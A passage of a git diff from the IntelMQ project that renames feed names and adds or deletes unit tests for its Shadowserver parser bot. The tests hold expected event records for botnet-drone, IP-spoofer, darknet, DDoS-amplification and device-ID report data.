rename to intelmq/tests/bots/parsers/shadowserver/scan_rdpeudp.csv.license
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_blocklist.py b/intelmq/tests/bots/parsers/shadowserver/test_blocklist.py
index a2794b549..48509eea0 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_blocklist.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_blocklist.py
@@ -16,7 +16,7 @@
 EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
 
 EXAMPLE_REPORT = {
-    'feed.name': 'Blocklist',
+    'feed.name': 'Block Listed IP Addresses',
     "raw": utils.base64_encode(EXAMPLE_FILE),
     "__type": "Report",
     "time.observation": "2015-01-01T00:00:00+00:00",
@@ -24,7 +24,7 @@
 }
 EVENTS = [{
     '__type': 'Event',
-    'feed.name': 'Blocklist',
+    'feed.name': 'Block Listed IP Addresses',
     "classification.identifier": "blacklisted-ip",
     "classification.taxonomy": "other",
     "classification.type": "blacklist",
@@ -44,7 +44,7 @@
 },
 {
     '__type': 'Event',
-    'feed.name': 'Blocklist',
+    'feed.name': 'Block Listed IP Addresses',
     "classification.identifier": "blacklisted-ip",
     "classification.taxonomy": "other",
     "classification.type": "blacklist",
@@ -63,7 +63,7 @@
 },
 {
     '__type': 'Event',
-    'feed.name': 'Blocklist',
+    'feed.name': 'Block Listed IP Addresses',
     "classification.identifier": "blacklisted-ip",
     "classification.taxonomy": "other",
     "classification.type": "blacklist",
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_botnet_drone.py b/intelmq/tests/bots/parsers/shadowserver/test_botnet_drone.py
deleted file mode 100644
index eefb378a0..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_botnet_drone.py
+++ /dev/null
@@ -1,280 +0,0 @@
-# SPDX-FileCopyrightText: 2019 Guillermo Rodriguez
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__), 'testdata/botnet_drone.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {"feed.name": "ShadowServer Drone",
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-botnet_drone-test-geo.csv",
-                  }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'ShadowServer Drone',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8560,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '74.208.164.166',
-           'destination.port': 80,
-           'extra.os.name': 'Windows',
-           'extra.os.version': '2000 SP4, XP SP1+',
-           'extra.connection_count': 1,
-           'extra.family': 'dorkbot',
-           'extra.naics': 541690,
-           'extra.public_source': 'AnubisNetworks',
-           'extra.sic': 874899,
-           'extra.tag': 'sinkhole',
-           'malware.name': 'dorkbot',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'source.geolocation.cc': 'AU',
-           'source.geolocation.city': 'MELBOURNE',
-           'source.geolocation.region': 'VICTORIA',
-           'source.ip': '210.23.139.130',
-           'source.port': 3218,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2011-04-23T00:00:05+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'ShadowServer Drone',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.fqdn': '015.example.com',
-           'destination.geolocation.cc': 'NL',
-           'destination.ip': '94.75.228.147',
-           'extra.os.name': 'WINXP',
-           'extra.connection_count': 1,
-           'extra.destination.naics': 517510,
-           'extra.destination.sector': 'Commercial Facilities',
-           'extra.destination.sic': 737415,
-           'malware.name': 'spyeye',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'source.asn': 9556,
-           'source.geolocation.cc': 'AU',
-           'source.geolocation.city': 'ADELAIDE',
-           'source.geolocation.region': 'SOUTH AUSTRALIA',
-           'source.ip': '115.166.54.44',
-           'source.reverse_dns': '115-166-54-44.ip.adam.com.au',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2011-04-23T00:00:08+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'ShadowServer Drone',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8560,
-           'destination.geolocation.cc': 'DE',
-           'destination.ip': '87.106.24.200',
-           'destination.port': 80,
-           'extra.os.version': 'XP SP1+, 2000 SP3 (2)',
-           'extra.os.name': 'Windows',
-           'extra.naics': 541690,
-           'extra.sic': 874899,
-           'malware.name': 'sinkhole',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[3]])),
-           'source.asn': 9822,
-           'source.geolocation.cc': 'AU',
-           'source.geolocation.city': 'PERTH',
-           'source.geolocation.region': 'WESTERN AUSTRALIA',
-           'source.ip': '116.212.205.74',
-           'source.port': 48986,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2011-04-23T00:00:10+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'ShadowServer Drone',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8560,
-           'destination.geolocation.cc': 'DE',
-           'destination.ip': '87.106.24.200',
-           'destination.port': 443,
-           'extra.os.version': '2000 SP4, XP SP1+',
-           'extra.connection_count': 1,
-           'extra.os.name': 'Windows',
-           'extra.destination.sector': 'Communications',
-           'extra.public_source': 'SecurityScorecard',
-           'malware.name': 'sinkhole',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[4]])),
-           'source.asn': 1221,
-           'source.geolocation.cc': 'AU',
-           'source.geolocation.city': 'DEVONPORT',
-           'source.geolocation.region': 'TASMANIA',
-           'source.ip': '58.169.82.113',
-           'source.port': 2423,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2011-04-23T00:00:15+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'ShadowServer Drone',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8560,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '74.208.164.166',
-           'destination.port': 443,
-           'extra.os.name': 'Windows',
-           'extra.os.version': '2000 SP4, XP SP1+',
-           'extra.connection_count': 1,
-           'extra.destination.naics': 517510,
-           'extra.destination.sector': 'Commercial Facilities',
-           'extra.destination.sic': 737415,
-           'extra.id': 'mu6lam0neitheenahz6Phee6lee1zaelahtha2xu',
-           'extra.naics': 541690,
-           'extra.sic': 874899,
-           'malware.name': 'sinkhole',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[5]])),
-           'source.asn': 4804,
-           'source.geolocation.cc': 'AU',
-           'source.geolocation.city': 'BRISBANE',
-           'source.geolocation.region': 'QUEENSLAND',
-           'source.ip': '114.78.17.48',
-           'source.port': 2769,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2011-04-23T00:00:26+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'ShadowServer Drone',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8560,
-           'destination.geolocation.cc': 'DE',
-           'destination.ip': '87.106.24.200',
-           'destination.port': 443,
-           'extra.os.name': 'Windows',
-           'extra.os.version': '2000 SP4, XP SP1+',
-           'extra.destination.sector': 'Communications',
-           'extra.sector': 'Communications',
-           'malware.name': 'sinkhole',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[6]])),
-           'source.asn': 1221,
-           'source.geolocation.cc': 'AU',
-           'source.geolocation.city': 'MELBOURNE',
-           'source.geolocation.region': 'VICTORIA',
-           'source.ip': '124.190.16.11',
-           'source.port': 4095,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2011-04-23T00:00:28+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'ShadowServer Drone',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8560,
-           'destination.geolocation.cc': 'DE',
-           'destination.ip': '87.106.24.200',
-           'destination.port': 443,
-           'extra.connection_count': 1,
-           'extra.os.version': 'XP/2000 (RFC1323+, w+, tstamp+)',
-           'extra.os.name': 'Windows',
-           'extra.destination.naics': 517510,
-           'extra.destination.sector': 'Communications',
-           'extra.destination.sic': 737415,
-           'malware.name': 'sinkhole',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[7]])),
-           'source.asn': 1221,
-           'source.geolocation.cc': 'AU',
-           'source.geolocation.city': 'PERTH',
-           'source.geolocation.region': 'WESTERN AUSTRALIA',
-           'source.ip': '124.182.36.33',
-           'source.port': 60837,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2011-04-23T00:00:29+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'ShadowServer Drone',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8560,
-           'destination.geolocation.cc': 'US',
-           'destination.ip': '74.208.164.166',
-           'destination.port': 80,
-           'extra.connection_count': 1,
-           'extra.os.name': 'Windows',
-           'extra.os.version': 'XP SP1+, 2000 SP3 (2)',
-           'extra.destination.naics': 517510,
-           'extra.destination.sector': 'Communications',
-           'extra.destination.sic': 737415,
-           'extra.naics': 541690,
-           'extra.sic': 874899,
-           'malware.name': 'sinkhole',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[8]])),
-           'source.asn': 9822,
-           'source.geolocation.cc': 'AU',
-           'source.geolocation.city': 'PERTH',
-           'source.geolocation.region': 'WESTERN AUSTRALIA',
-           'source.ip': '116.212.205.74',
-           'source.port': 23321,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2011-04-23T00:00:33+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'ShadowServer Drone',
-           'classification.taxonomy': 'abusive-content',
-           'classification.type': 'spam',
-           'classification.identifier': 'spam',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[9]])),
-           'source.asn': 65548,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'EISENSTADT',
-           'source.geolocation.region': 'BURGENLAND',
-           'source.ip': '192.0.2.15',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2018-08-14T02:13:36+00:00',
-           'extra.tag': 'spam',
-           },
-          ]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-    def test_overwrite(self):
-        """ Test if overwrite parameter works. """
-        self.input_message = EXAMPLE_REPORT.copy()
-        self.input_message['feed.name'] = 'My-Drone'
-        self.allowed_warning_count = 1
-        self.prepare_bot(parameters={'feedname': 'Drone', 'overwrite': True})
-        self.run_bot(prepare=False)
-        for i, EVENT in enumerate(EVENTS):
-            event = EVENT.copy()
-            event['feed.name'] = 'Drone'
-            self.assertMessageEqual(i, event)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_broken.py b/intelmq/tests/bots/parsers/shadowserver/test_broken.py
index 64bd342f3..472dd0b90 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_broken.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_broken.py
@@ -15,9 +15,7 @@
            "time.observation": "2015-01-01T00:00:00+00:00",
            "extra.file_name": "2019-01-01-scan_http-test-test.csv",
            }
-REPORT2 = {"raw": utils.base64_encode('''timestamp,ip,port
-2018-08-01T00:00:00+00,127.0.0.1,80
-'''),
+REPORT2 = {"raw": utils.base64_encode('timestamp,ip,port\n2018-08-01T00:00:00+00,127.0.0.1,80'),
            "__type": "Report",
            "time.observation": "2015-01-01T00:00:00+00:00",
            "extra.file_name": "2019-01-01-scan_ftp-test-test.csv",
@@ -62,10 +60,10 @@ def test_half_broken(self):
         Test a report which does not have an optional field.
         """
         self.input_message = REPORT2
-        self.run_bot(allowed_warning_count=54)
+        self.run_bot(allowed_warning_count=63)
         self.assertLogMatches(pattern="Detected report's file name: 'scan_ftp'.",
                               levelname="DEBUG")
-        self.assertLogMatches(pattern="Optional key 'protocol' not found in feed 'Accessible-FTP'. Possible change in data format or misconfiguration.",
+        self.assertLogMatches(pattern="Optional key 'jarm' not found in feed 'Accessible-FTP'.",
                               levelname="WARNING")
         self.assertLogMatches(pattern=r"Sent 1 events and found 0 problem\(s\)\.",
                               levelname="INFO")
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_caida_ip_spoofer.py b/intelmq/tests/bots/parsers/shadowserver/test_caida_ip_spoofer.py
deleted file mode 100644
index 2bf148e55..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_caida_ip_spoofer.py
+++ /dev/null
@@ -1,178 +0,0 @@
-# SPDX-FileCopyrightText: 2020 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__), "testdata/caida_ip_spoofer.csv")) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {
-    "feed.name": "CAIDA",
-    "raw": utils.base64_encode(EXAMPLE_FILE),
-    "__type": "Report",
-    "time.observation": "2020-08-19T00:00:00+00:00",
-    "extra.file_name": "2020-08-19-caida_ip_spoofer-test.csv",
-}
-
-EVENTS = [
-    {
-        "__type": "Event",
-        "feed.name": "CAIDA",
-        "time.source": "2019-08-27T00:06:24+00:00",
-        "source.ip": "137.97.71.0",
-
-        "source.asn": 55836,
-
-        "source.geolocation.cc": "IN",
-        "source.geolocation.region": "KERALA",
-        "source.geolocation.city": "THRISSUR",
-        "extra.type": "Session",
-        "extra.naics": 517312,
-        "extra.sic": 0,
-        "extra.sector": "Information Technology",
-        "source.network": "137.97.71.0/24",
-        "extra.routedspoof": "received",
-        "extra.session": 739969,
-        "extra.nat": True,
-        "extra.public_source": "caida",
-
-        "classification.identifier": "ip-spoofer",
-        "classification.taxonomy": "fraud",
-        "classification.type": "masquerade",
-
-        "raw": utils.base64_encode("\n".join((EXAMPLE_LINES[0], EXAMPLE_LINES[1]))),
-        "time.observation": "2020-08-19T00:00:00+00:00",
-    },
-    {
-        "__type": "Event",
-        "feed.name": "CAIDA",
-        "time.source": "2019-08-27T01:19:47+00:00",
-        "source.ip": "103.95.33.0",
-
-        "source.asn": 136749,
-
-        "source.geolocation.cc": "MY",
-        "source.geolocation.region": "SELANGOR",
-        "source.geolocation.city": "SHAH ALAM",
-        "extra.type": "Session",
-        "extra.naics": 541990,
-        "extra.sic": 0,
-        "extra.sector": "Communications",
-        "source.network": "103.95.33.0/24",
-        "extra.routedspoof": "received",
-        "extra.session": 739992,
-        "extra.nat": True,
-        "extra.public_source": "caida",
-
-        "classification.identifier": "ip-spoofer",
-        "classification.taxonomy": "fraud",
-        "classification.type": "masquerade",
-
-        "raw": utils.base64_encode("\n".join((EXAMPLE_LINES[0], EXAMPLE_LINES[2]))),
-        "time.observation": "2020-08-19T00:00:00+00:00",
-    },
-    {
-        "__type": "Event",
-        "feed.name": "CAIDA",
-        "time.source": "2019-08-27T02:32:12+00:00",
-        "source.ip": "115.78.9.0",
-
-        "source.asn": 7552,
-
-        "source.geolocation.cc": "VN",
-        "source.geolocation.region": "HO CHI MINH",
-        "source.geolocation.city": "THANH PHO HO CHI MINH",
-        "extra.type": "Session",
-        "extra.naics": 517312,
-        "extra.sic": 0,
-        "extra.sector": "Communications",
-        "source.network": "115.78.9.0/24",
-        "extra.routedspoof": "rewritten",
-        "extra.session": 740024,
-        "extra.nat": True,
-        "extra.public_source": "caida",
-
-        "classification.identifier": "ip-spoofer",
-        "classification.taxonomy": "fraud",
-        "classification.type": "masquerade",
-
-        "raw": utils.base64_encode("\n".join((EXAMPLE_LINES[0], EXAMPLE_LINES[3]))),
-        "time.observation": "2020-08-19T00:00:00+00:00",
-    },
-    {
-        "__type": "Event",
-        "feed.name": "CAIDA",
-        "time.source": "2019-08-27T03:16:08+00:00",
-        "source.ip": "24.237.163.0",
-
-        "source.asn": 8047,
-        "source.reverse_dns": "0-163-237-24.gci.net",
-
-        "source.geolocation.cc": "US",
-        "source.geolocation.region": "ALASKA",
-        "source.geolocation.city": "BETHEL",
-        "extra.type": "Session",
-        "extra.naics": 517919,
-        "extra.sic": 737415,
-        "source.network": "24.237.163.0/24",
-        "extra.routedspoof": "received",
-        "extra.session": 740037,
-        "extra.nat": False,
-        "extra.public_source": "caida",
-
-        "classification.identifier": "ip-spoofer",
-        "classification.taxonomy": "fraud",
-        "classification.type": "masquerade",
-
-        "raw": utils.base64_encode("\n".join((EXAMPLE_LINES[0], EXAMPLE_LINES[4]))),
-        "time.observation": "2020-08-19T00:00:00+00:00",
-    },
-    {
-        "__type": "Event",
-        "feed.name": "CAIDA",
-        "time.source": "2019-08-27T04:29:49+00:00",
-        "source.ip": "122.255.35.0",
-
-        "source.asn": 18001,
-
-        "extra.type": "Session",
-        "source.network": "122.255.35.0/24",
-        "extra.routedspoof": "received",
-        "extra.session": 740057,
-        "extra.nat": False,
-        "extra.public_source": "caida",
-
-        "classification.identifier": "ip-spoofer",
-        "classification.taxonomy": "fraud",
-        "classification.type": "masquerade",
-
-        "raw": utils.base64_encode("\n".join((EXAMPLE_LINES[0], EXAMPLE_LINES[5]))),
-        "time.observation": "2020-08-19T00:00:00+00:00",
-    },
-]
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == "__main__":
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_darknet.py b/intelmq/tests/bots/parsers/shadowserver/test_darknet.py
deleted file mode 100644
index be574b9b7..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_darknet.py
+++ /dev/null
@@ -1,104 +0,0 @@
-# SPDX-FileCopyrightText: 2018 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__),
-                       'testdata/darknet.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {"feed.name": "ShadowServer Darknet",
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-darknet-test-geo.csv",
-                  }
-EVENTS = [{'__type': 'Event',
-           'classification.identifier': 'mirai-like',
-           'classification.taxonomy': 'other',
-           'classification.type': 'other',
-           'destination.port': 8001,
-           'extra.count': 1,
-           'extra.naics': 518210,
-           'extra.public_source': 'sissden',
-           'extra.sic': 737415,
-           'feed.name': 'ShadowServer Darknet',
-           'source.asn': 64496,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'VIENNA',
-           'source.geolocation.region': 'WIEN',
-           'source.ip': '198.51.100.47',
-           'source.reverse_dns': '198-51-100-47.example.net',
-           'time.source': '2018-11-19T00:00:17+00:00',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           },
-          {'__type': 'Event',
-           'classification.identifier': 'mirai-like',
-           'classification.taxonomy': 'other',
-           'classification.type': 'other',
-           'destination.port': 80,
-           'extra.count': 2,
-           'extra.public_source': 'sissden',
-           'feed.name': 'ShadowServer Darknet',
-           'source.asn': 64497,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'DEUTSCHLANDSBERG',
-           'source.geolocation.region': 'STEIERMARK',
-           'source.ip': '198.51.100.4',
-           'source.reverse_dns': '198-51-100-4.example.net',
-           'time.source': '2018-11-19T00:00:25+00:00',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           },
-          {'__type': 'Event',
-           'classification.identifier': 'mirai-like',
-           'classification.taxonomy': 'other',
-           'classification.type': 'other',
-           'destination.port': 5555,
-           'extra.count': 2,
-           'extra.naics': 518210,
-           'extra.public_source': 'sissden',
-           'extra.sector': 'Information Technology',
-           'extra.sic': 737401,
-           'feed.name': 'ShadowServer Darknet',
-           'source.asn': 64498,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'VIENNA',
-           'source.geolocation.region': 'WIEN',
-           'source.ip': '198.51.100.146',
-           'time.source': '2018-11-19T22:58:23+00:00',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[3]])),
-           },
-          ]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_ddos_amplification.py b/intelmq/tests/bots/parsers/shadowserver/test_ddos_amplification.py
deleted file mode 100644
index 80790995e..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_ddos_amplification.py
+++ /dev/null
@@ -1,99 +0,0 @@
-# SPDX-FileCopyrightText: 2019 Guillermo Rodriguez
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__), 'testdata/ddos_amplification.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {'feed.name': 'Amplification DDoS Victim',
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2019-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-ddos_amplification-test-test.csv"
-                  }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Amplification DDoS Victim',
-           'classification.identifier': 'amplification-ddos-victim',
-           'classification.taxonomy': 'availability',
-           'classification.type': 'ddos',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'time.observation': '2019-01-01T00:00:00+00:00',
-           'time.source': '2018-10-09T06:00:06+00:00',
-           'source.ip': '192.0.2.10',
-           'source.port': 53,
-           'protocol.transport': 'udp',
-           'destination.port': 13,
-           'source.reverse_dns': '192-0-2-10.example.net',
-           'source.asn': 44395,
-           'source.geolocation.cc': 'AM',
-           'source.geolocation.region': 'YEREVAN',
-           'source.geolocation.city': 'YEREVAN',
-           'extra.tag': 'daytime',
-           'extra.request': 'DAYTIME Request',
-           'extra.count': 15,
-           'extra.bytes': 2220,
-           'extra.sensor_geo': 'RU',
-           'extra.sector': 'IT1',
-           'extra.end_time': '2018-10-09T06:10:01+00:00',
-           'extra.public_source': 'SSS',
-           },
-           {'__type': 'Event',
-           'feed.name': 'Amplification DDoS Victim',
-           'classification.identifier': 'amplification-ddos-victim',
-           'classification.taxonomy': 'availability',
-           'classification.type': 'ddos',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'time.observation': '2019-01-01T00:00:00+00:00',
-           'time.source': '2018-10-09T08:14:37+00:00',
-           'source.ip': '192.0.2.50',
-           'source.port': 53,
-           'protocol.transport': 'udp',
-           'destination.port': 123,
-           'source.reverse_dns': 'dhcp-50-2-0-192.net1.bg',
-           'source.asn': 43561,
-           'source.geolocation.cc': 'BG',
-           'source.geolocation.region': 'SOFIA-GRAD',
-           'source.geolocation.city': 'SOFIA',
-           'extra.tag': 'ntp',
-           'extra.request': 'Standard query response 0xe98a  NS auth111.ns.uu.net NS auth120.ns.uu.net',
-           'extra.count': 15,
-           'extra.bytes': 2700,
-           'extra.sensor_geo': 'RU',
-           'extra.sector': 'IT2',
-           'extra.end_time': '2018-10-09T10:14:59+00:00',
-           'extra.public_source': 'SSS',
-           },
-          ]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_device_id.py b/intelmq/tests/bots/parsers/shadowserver/test_device_id.py
new file mode 100644
index 000000000..e8954e03c
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_device_id.py
@@ -0,0 +1,116 @@
+# SPDX-FileCopyrightText: 2019 Guillermo Rodriguez
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/device_id.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Device ID',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-device_id-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'device-id',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'undetermined',
+   'extra.device_model' : 'FortiGate',
+   'extra.device_type' : 'firewall',
+   'extra.device_vendor' : 'Fortinet',
+   'extra.naics' : 517311,
+   'feed.name' : 'Device ID',
+   'extra.tag' : 'ssl,vpn',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 2116,
+   'source.geolocation.cc' : 'NO',
+   'source.geolocation.city' : 'TROMVIK',
+   'source.geolocation.region' : 'TROMS OG FINNMARK',
+   'source.ip' : '88.84.0.0',
+   'source.port' : 10443,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:01:42+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'device-id',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'undetermined',
+   'extra.device_model' : 'FortiGate',
+   'extra.device_type' : 'firewall',
+   'extra.device_vendor' : 'Fortinet',
+   'feed.name' : 'Device ID',
+   'extra.tag' : 'ssl,vpn',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 27843,
+   'source.geolocation.cc' : 'PE',
+   'source.geolocation.city' : 'LIMA',
+   'source.geolocation.region' : 'METROPOLITANA DE LIMA',
+   'source.ip' : '170.231.0.0',
+   'source.port' : 10443,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:01:42+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'device-id',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'undetermined',
+   'extra.device_model' : 'FortiGate',
+   'extra.device_type' : 'firewall',
+   'extra.device_vendor' : 'Fortinet',
+   'extra.naics' : 517311,
+   'feed.name' : 'Device ID',
